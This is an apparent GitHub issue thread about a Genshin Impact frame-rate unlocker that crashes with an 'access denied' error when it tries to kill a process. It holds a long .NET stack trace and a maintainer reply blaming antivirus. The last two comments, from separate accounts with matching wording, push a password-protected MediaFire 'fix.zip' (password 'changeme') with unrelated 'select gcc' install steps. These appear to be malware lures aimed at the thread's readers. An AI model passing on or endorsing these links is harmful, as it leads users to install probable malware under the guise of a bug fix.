### ISSUE TITLE
原神帧率解锁异常文本导致原神卡死

### ISSUE THREAD

**Issue by xingjieoj** [34736384/genshin-fps-unlock#455]
************** 异常文本 **************
System.ComponentModel.Win32Exception (5): 拒绝访问。
   at System.Diagnostics.Process.Kill()
   at unlockfps_nc.Service.ProcessService.<>c.<Start>b__16_1(Process x)
   at System.Collections.Generic.List`1.ForEach(Action`1 action)
   at unlockfps_nc.Service.ProcessService.Start()
   at unlockfps_nc.MainForm.BtnStartGame_Click(Object sender, EventArgs e)
   at System.Windows.Forms.Button.OnClick(EventArgs e)
   at System.Windows.Forms.Button.OnMouseUp(MouseEventArgs mevent)
   at System.Windows.Forms.Control.WmMouseUp(Message& m, MouseButtons button, Int32 clicks)
   at System.Windows.Forms.Control.WndProc(Message& m)
   at System.Windows.Forms.ButtonBase.WndProc(Message& m)
   at System.Windows.Forms.NativeWindow.Callback(HWND hWnd, MessageId msg, WPARAM wparam, LPARAM lparam)

************** 已加载的程序集 **************
System.Private.CoreLib
    程序集版本: 8.0.0.0
    位置: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.5\System.Private.CoreLib.dll
----------------------------------------
unlockfps_nc
    程序集版本: 1.0.0.0
    位置: 
----------------------------------------
System.Runtime
    程序集版本: 8.0.0.0
    位置: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.5\System.Runtime.dll
----------------------------------------
System.Windows.Forms
    程序集版本: 8.0.0.0
    位置: C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.5\System.Windows.Forms.dll
----------------------------------------
System.Runtime.InteropServices
    程序集版本: 8.0.0.0
    位置: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.5\System.Runtime.InteropServices.dll
----------------------------------------
Microsoft.Extensions.DependencyInjection.Abstractions
    程序集版本: 8.0.0.0
    位置: 
----------------------------------------
System.ComponentModel.Primitives
    程序集版本: 8.0.0.0
    位置: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.5\System.ComponentModel.Primitives.dll
----------------------------------------
System.Windows.Forms.Primitives
    程序集版本: 8.0.0.0
    位置: C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.5\System.Windows.Forms.Primitives.dll
----------------------------------------
System.Drawing.Primitives
    程序集版本: 8.0.0.0
    位置: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.5\System.Drawing.Primitives.dll
----------------------------------------
System.Collections.Specialized
    程序集版本: 8.0.0.0
    位置: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.5\System.Collections.Specialized.dll
----------------------------------------
Microsoft.Extensions.DependencyInjection
    程序集版本: 8.0.0.0
    位置: 
----------------------------------------
System.ComponentModel
    程序集版本: 8.0.0.0
    位置: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.5\System.ComponentModel.dll
----------------------------------------
System.Collections
    程序集版本: 8.0.0.0
    位置: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.5\System.Collections.dll
----------------------------------------
System.Collections.Concurrent
    程序集版本: 8.0.0.0
    位置: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.5\System.Collections.Concurrent.dll
----------------------------------------
System.Diagnostics.Tracing
    程序集版本: 8.0.0.0
    位置: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.5\System.Diagnostics.Tracing.dll
----------------------------------------
System.Threading
    程序集版本: 8.0.0.0
    位置: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.5\System.Threading.dll
----------------------------------------
System.Diagnostics.TraceSource
    程序集版本: 8.0.0.0
    位置: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.5\System.Diagnostics.TraceSource.dll
----------------------------------------
System.Drawing.Common
    程序集版本: 8.0.0.0
    位置: C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.5\System.Drawing.Common.dll
----------------------------------------
System.Threading.ThreadPool
    程序集版本: 8.0.0.0
    位置: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.5\System.Threading.ThreadPool.dll
----------------------------------------
Newtonsoft.Json
    程序集版本: 13.0.0.0
    位置: 
----------------------------------------
System.Runtime.Serialization.Formatters
    程序集版本: 8.0.0.0
    位置: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.5\System.Runtime.Serialization.Formatters.dll
----------------------------------------
System.Linq.Expressions
    程序集版本: 8.0.0.0
    位置: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.5\System.Linq.Expressions.dll
----------------------------------------
System.Runtime.Numerics
    程序集版本: 8.0.0.0
    位置: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.5\System.Runtime.Numerics.dll
----------------------------------------
System.Private.Uri
    程序集版本: 8.0.0.0
    位置: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.5\System.Private.Uri.dll
----------------------------------------
System.Linq
    程序集版本: 8.0.0.0
    位置: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.5\System.Linq.dll
----------------------------------------
System.ComponentModel.TypeConverter
    程序集版本: 8.0.0.0
    位置: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.5\System.ComponentModel.TypeConverter.dll
----------------------------------------
System.ObjectModel
    程序集版本: 8.0.0.0
    位置: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.5\System.ObjectModel.dll
----------------------------------------
System.Runtime.Serialization.Primitives
    程序集版本: 8.0.0.0
    位置: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.5\System.Runtime.Serialization.Primitives.dll
----------------------------------------
System.Data.Common
    程序集版本: 8.0.0.0
    位置: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.5\System.Data.Common.dll
----------------------------------------
System.Xml.ReaderWriter
    程序集版本: 8.0.0.0
    位置: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.5\System.Xml.ReaderWriter.dll
----------------------------------------
System.Private.Xml
    程序集版本: 8.0.0.0
    位置: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.5\System.Private.Xml.dll
----------------------------------------
System.Reflection.Emit.ILGeneration
    程序集版本: 8.0.0.0
    位置: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.5\System.Reflection.Emit.ILGeneration.dll
----------------------------------------
System.Reflection.Emit.Lightweight
    程序集版本: 8.0.0.0
    位置: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.5\System.Reflection.Emit.Lightweight.dll
----------------------------------------
System.Reflection.Primitives
    程序集版本: 8.0.0.0
    位置: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.5\System.Reflection.Primitives.dll
----------------------------------------
System.Memory
    程序集版本: 8.0.0.0
    位置: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.5\System.Memory.dll
----------------------------------------
Anonymously Hosted DynamicMethods Assembly
    程序集版本: 0.0.0.0
    位置: 
----------------------------------------
Microsoft.Win32.Primitives
    程序集版本: 8.0.0.0
    位置: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.5\Microsoft.Win32.Primitives.dll
----------------------------------------
System.ComponentModel.EventBasedAsync
    程序集版本: 8.0.0.0
    位置: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.5\System.ComponentModel.EventBasedAsync.dll
----------------------------------------
System.Threading.Thread
    程序集版本: 8.0.0.0
    位置: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.5\System.Threading.Thread.dll
----------------------------------------
Accessibility
    程序集版本: 4.0.0.0
    位置: C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.5\Accessibility.dll
----------------------------------------
Microsoft.Win32.SystemEvents
    程序集版本: 8.0.0.0
    位置: C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.5\Microsoft.Win32.SystemEvents.dll
----------------------------------------
System.Numerics.Vectors
    程序集版本: 8.0.0.0
    位置: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.5\System.Numerics.Vectors.dll
----------------------------------------
System.Runtime.Loader
    程序集版本: 8.0.0.0
    位置: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.5\System.Runtime.Loader.dll
----------------------------------------
System.Windows.Forms.resources
    程序集版本: 8.0.0.0
    位置: C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.5\zh-Hans\System.Windows.Forms.resources.dll
----------------------------------------
System.Resources.Extensions
    程序集版本: 8.0.0.0
    位置: C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.5\System.Resources.Extensions.dll
----------------------------------------
System.Drawing
    程序集版本: 8.0.0.0
    位置: C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.5\System.Drawing.dll
----------------------------------------
System.Collections.NonGeneric
    程序集版本: 8.0.0.0
    位置: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.5\System.Collections.NonGeneric.dll
----------------------------------------
System.Diagnostics.Process
    程序集版本: 8.0.0.0
    位置: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.5\System.Diagnostics.Process.dll
----------------------------------------
System.IO.MemoryMappedFiles
    程序集版本: 8.0.0.0
    位置: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.5\System.IO.MemoryMappedFiles.dll
----------------------------------------
System.Diagnostics.StackTrace
    程序集版本: 8.0.0.0
    位置: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.5\System.Diagnostics.StackTrace.dll
----------------------------------------
System.Reflection.Metadata
    程序集版本: 8.0.0.0
    位置: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.5\System.Reflection.Metadata.dll
----------------------------------------
System.Collections.Immutable
    程序集版本: 8.0.0.0
    位置: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.5\System.Collections.Immutable.dll
----------------------------------------

************** JIT 调试 **************

**Comment by 34736384** [comment]
杀软挡了

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
